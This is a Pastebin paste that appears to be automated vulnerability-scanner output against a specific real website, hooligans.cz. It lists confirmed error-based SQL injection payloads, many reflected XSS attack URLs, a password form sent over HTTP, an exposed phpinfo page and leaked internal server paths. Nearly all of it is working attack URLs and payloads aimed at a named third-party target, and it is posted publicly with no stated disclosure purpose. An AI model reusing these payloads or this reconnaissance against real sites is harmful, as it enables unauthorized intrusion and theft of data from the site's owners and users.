API tools faq
paste
Advertisement
sroub3k

hooligans.cz

sroub3k
May 12th, 2012
431
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.34 KB | None | 0 0
raw download clone embed print report
  1. SQL Injection
  2.  
  3. Severity: Critical
  4. Confirmation: Confirmed
  5. Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&stromhlmenu=44
  6. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  7. Parameter Name: rstema
  8. Parameter Type: Querystring
  9. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  10.  
  11. Severity: Critical
  12. Confirmation: Confirmed
  13. Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  14. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  15. Parameter Name: rstema
  16. Parameter Type: Querystring
  17. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  18.  
  19. [High Possibility] SQL Injection
  20.  
  21. Severity: Critical
  22. Confirmation: Confirmed
  23. Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=%27&stromhlmenu=44
  24. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  25. Parameter Name: rstema
  26. Parameter Type: Querystring
  27. Attack Pattern: %27
  28.  
  29. Severity: Critical
  30. Confirmation: Confirmed
  31. Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=%27
  32. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  33. Parameter Name: rstema
  34. Parameter Type: Querystring
  35. Attack Pattern: %27
  36.  
  37. Severity: Critical
  38. Confirmation: Confirmed
  39. Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=44&stromhlmenu=%27
  40. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  41. Parameter Name: stromhlmenu
  42. Parameter Type: Querystring
  43. Attack Pattern: %27
  44.  
  45. Severity: Critical
  46. Confirmation: Confirmed
  47. Vulnerable URL: http://www.hooligans.cz/?strana=%27
  48. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  49. Parameter Name: strana
  50. Parameter Type: Querystring
  51. Attack Pattern: %27
  52.  
  53. Severity: Critical
  54. Confirmation: Confirmed
  55. Vulnerable URL: http://www.hooligans.cz/index.php?strana=%27
  56. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  57. Parameter Name: strana
  58. Parameter Type: Querystring
  59. Attack Pattern: %27
  60.  
  61. ||| Password Transmitted Over HTTP
  62.  
  63. Severity: Important
  64. Confirmation: Confirmed
  65. Vulnerable URL: http://www.hooligans.cz/galerie/login.php?referer=index.php?cat=46
  66. Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
  67. Form target action: login.php?referer=index.php%3Fcat%3D46
  68.  
  69. ||| XSS (Cross-site Scripting)
  70.  
  71. Severity: Important
  72. Confirmation: Confirmed
  73. Vulnerable URL: http://www.hooligans.cz/view.php?cisloclanku='"--></style></script><script>alert(0x00141D)</script>
  74. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  75. Parameter Name: cisloclanku
  76. Parameter Type: Querystring
  77. Attack Pattern: '"--></style></script><script>alert(0x00141D)</script>
  78.  
  79. Severity: Important
  80. Confirmation: Confirmed
  81. Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost="></script><script>alert(9)</script>&rstext=all-phpRS-all&rstema=44&stromhlmenu=44
  82. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  83. Parameter Name: rsvelikost
  84. Parameter Type: Querystring
  85. Attack Pattern: "></script><script>alert(9)</script>
  86.  
  87. Severity: Important
  88. Confirmation: Confirmed
  89. Vulnerable URL: http://www.hooligans.cz/comment.php?akce=view&cisloclanku=2012050015'"--></style></script><script>alert(0x001482)</script>
  90. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  91. Parameter Name: cisloclanku
  92. Parameter Type: Querystring
  93. Attack Pattern: 2012050015'"--></style></script><script>alert(0x001482)</script>
  94.  
  95. Severity: Important
  96. Confirmation: Confirmed
  97. Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext='"--></style></script><script>alert(0x00149A)</script>&rstema=44&stromhlmenu=44
  98. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  99. Parameter Name: rstext
  100. Parameter Type: Querystring
  101. Attack Pattern: '"--></style></script><script>alert(0x00149A)</script>
  102.  
  103. Severity: Important
  104. Confirmation: Confirmed
  105. Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema='"--></style></script><script>alert(0x0014B7)</script>&stromhlmenu=44
  106. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  107. Parameter Name: rstema
  108. Parameter Type: Querystring
  109. Attack Pattern: '"--></style></script><script>alert(0x0014B7)</script>
  110.  
  111. Severity: Important
  112. Confirmation: Confirmed
  113. Vulnerable URL: http://www.hooligans.cz/rservice.php?akce=info&cisloclanku='"--></style></script><script>alert(0x0014DB)</script>
  114. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  115. Parameter Name: cisloclanku
  116. Parameter Type: Querystring
  117. Attack Pattern: '"--></style></script><script>alert(0x0014DB)</script>
  118.  
  119. Severity: Important
  120. Confirmation: Confirmed
  121. Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=44&stromhlmenu='"--></style></script><script>alert(0x0014D7)</script>
  122. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  123. Parameter Name: stromhlmenu
  124. Parameter Type: Querystring
  125. Attack Pattern: '"--></style></script><script>alert(0x0014D7)</script>
  126.  
  127. Severity: Important
  128. Confirmation: Confirmed
  129. Vulnerable URL: http://www.hooligans.cz/search.php
  130. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  131. Parameter Name: rstext
  132. Parameter Type: Post
  133. Attack Pattern: '"--></style></script><script>alert(0x0015A4)</script>
  134.  
  135. Severity: Important
  136. Confirmation: Confirmed
  137. Vulnerable URL: http://www.hooligans.cz/download.php?akce=detail&id_detail=8&sekce='"--></style></script><script>alert(0x00161F)</script>
  138. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  139. Parameter Name: sekce
  140. Parameter Type: Querystring
  141. Attack Pattern: '"--></style></script><script>alert(0x00161F)</script>
  142.  
  143. Severity: Important
  144. Confirmation: Confirmed
  145. Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema="><script>alert(9)</script>
  146. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  147. Parameter Name: rstema
  148. Parameter Type: Querystring
  149. Attack Pattern: "><script>alert(9)</script>
  150.  
  151.  
  152. Severity: Important
  153. Confirmation: Confirmed
  154. Vulnerable URL: http://www.hooligans.cz/comment.php
  155. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  156. Parameter Name: cisloclanku
  157. Parameter Type: Post
  158. Attack Pattern: 2012050015'"--></style></script><script>alert(0x0016DD)</script>
  159.  
  160. Severity: Important
  161. Confirmation: Confirmed
  162. Vulnerable URL: http://www.hooligans.cz/rservice.php
  163. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  164. Parameter Name: cisloclanku
  165. Parameter Type: Post
  166. Attack Pattern: '"--></style></script><script>alert(0x001758)</script>
  167.  
  168. Severity: Important
  169. Confirmation: Confirmed
  170. Vulnerable URL: http://www.hooligans.cz/comment.php
  171. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  172. Parameter Name: cisloclanku
  173. Parameter Type: Post
  174. Attack Pattern: 2012050015'"--></style></script><script>alert(0x001797)</script>
  175.  
  176. Severity: Important
  177. Confirmation: Confirmed
  178. Vulnerable URL: http://www.hooligans.cz/download.php?akce=sekce&sekce=2'"--></style></script><script>alert(0x001A7A)</script>
  179. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  180. Parameter Name: sekce
  181. Parameter Type: Querystring
  182. Attack Pattern: 2'"--></style></script><script>alert(0x001A7A)</script>
  183.  
  184. Severity: Important
  185. Confirmation: Confirmed
  186. Vulnerable URL: http://www.hooligans.cz/ankety.php?akce=view&anketa=13'"--></style></script><script>alert(0x001AB5)</script>
  187. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  188. Parameter Name: anketa
  189. Parameter Type: Querystring
  190. Attack Pattern: 13'"--></style></script><script>alert(0x001AB5)</script>
  191.  
  192. ||| phpinfo() Information Disclosure
  193.  
  194. Severity : Low
  195. Confirmation: Confirmed
  196. Vulnerable URL: http://www.hooligans.cz/phpinfo.php
  197. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  198.  
  199. ||| Database Error Message
  200.  
  201. Severity: Low
  202. Confirmation: Confirmed
  203. Vulnerable URL: http://www.hooligans.cz/index.php?strana=%27
  204. Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
  205. Parameter Name: strana
  206. Parameter Type: Querystring
  207. Attack Pattern: %27
  208.  
  209. ||| MySQL Database Identified
  210.  
  211. Severity: Information
  212. Confirmation: Confirmed
  213. Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&stromhlmenu=44
  214. Vulnerability Classifications: -
  215. Parameter Name: rstema
  216. Parameter Type: Querystring
  217. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  218.  
  219. ||| [Possible] Internal Path Leakage (*nix)
  220.  
  221. Severity: Information
  222. Confirmation: Confirmed
  223. Vulnerable URL: http://www.hooligans.cz/phpinfo.php
  224. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  225. Identified Internal Path(s):
  226. /usr/bin&#039;
  227. /usr/sbin&#039;
  228. /usr/share&#039;
  229. /usr/include&#039;
  230. /usr/lib64&#039;
  231. /usr/libexec&#039;
  232. /usr/com&#039;
  233. /usr/share/man&#039;
  234. /usr/share/info&#039;
  235. /etc/php.d&#039;
  236. /usr/share/file/magic.mime&#039;
  237. /usr/sbin/apxs&#039;
  238. /etc/php.ini
  239. /etc/php.d
  240. /etc/php.d/Fileinfo.ini,
  241. /etc/php.d/dbase.ini,
  242. /etc/php.d/dom.ini,
  243. /etc/php.d/gd.ini,
  244. /etc/php.d/imap.ini,
  245. /etc/php.d/ldap.ini,
  246.  
  247. Severity: Information
  248. Confirmation: Confirmed
  249. Vulnerable URL: http://www.hooligans.cz/galerie/docs/
  250. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  251. Identified Internal Path(s):
  252. /usr/bin/X11/
  253. /etc/http/conf.d
  254. /var/my_images/
  255.  
  256. Severity: Information
  257. Confirmation: Confirmed
  258. Vulnerable URL : http://www.hooligans.cz/galerie/docs/faq.htm
  259. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  260. Identified Internal Path(s):
  261. /tmp/phpezCYKr
  262. /tmp/#sql_45d5_0.MYI
  263. /etc/http/conf.d
  264.  
  265. Severity: Information
  266. Confirmation: Confirmed
  267. Vulnerable URL : http://www.hooligans.cz/galerie/docs/index.htm
  268. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  269. Identified Internal Path(s):
  270. /usr/bin/X11/
  271. /etc/http/conf.d
  272. /var/my_images/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!